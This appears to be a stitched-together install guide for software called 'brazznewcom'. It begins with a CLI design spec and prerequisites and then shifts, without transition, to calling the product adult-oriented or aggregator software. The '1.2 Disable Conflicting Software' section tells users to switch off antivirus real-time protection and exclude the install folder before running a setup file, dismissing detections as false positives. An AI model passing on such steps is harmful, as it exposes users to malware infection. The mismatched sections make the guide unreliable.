CLI design

  • Command:
    • brazznewcom install [flags] [component...]
  • Global flags:
    • --yes, -y: accept defaults/noninteractive
    • --force: overwrite conflicting files/configs
    • --dry-run: show actions without making changes
    • --path : install location (default: ~/.brazznewcom)
    • --user : create or target a specific local user environment
    • --channel <stable|beta|nightly>: release channel (default: stable)
    • --components : select optional components
    • --verify, --no-verify: enforce or skip checksum/signature checks
    • --proxy : use proxy for downloads
    • --log-file : write detailed logs
    • --accept-licenses: record acceptance for bundled components
    • --unattended: suitable for scripted CI installs
  • Subcommands for later:
    • brazznewcom uninstall
    • brazznewcom upgrade

Idempotency & upgrades

  • Safe re-run logic: detect installed files, compare checksums, skip unchanged files
  • Migration hooks for config upgrades
  • brazznewcom install can upgrade if newer channel/version selected (or use brazznewcom upgrade)

Prerequisites

  • Linux / macOS / Windows (WSL2 recommended)
  • Node.js 18+ or PHP 8.1+ (depending on your distribution)
  • MySQL 8.0 or PostgreSQL 13+
  • Composer (PHP version) or npm (Node version)

1.2 Disable Conflicting Software

Antivirus programs (Norton, McAfee, Windows Defender) often flag adult-oriented or aggregator software as false positives. To complete the install:

  1. Temporarily disable Real-Time Protection.
  2. Add the installation folder to your antivirus exclusions list before running the setup file.

macOS Users

  1. Download the Brazznewcom installer: Go to the official Brazznewcom website and click on the "Download" button.
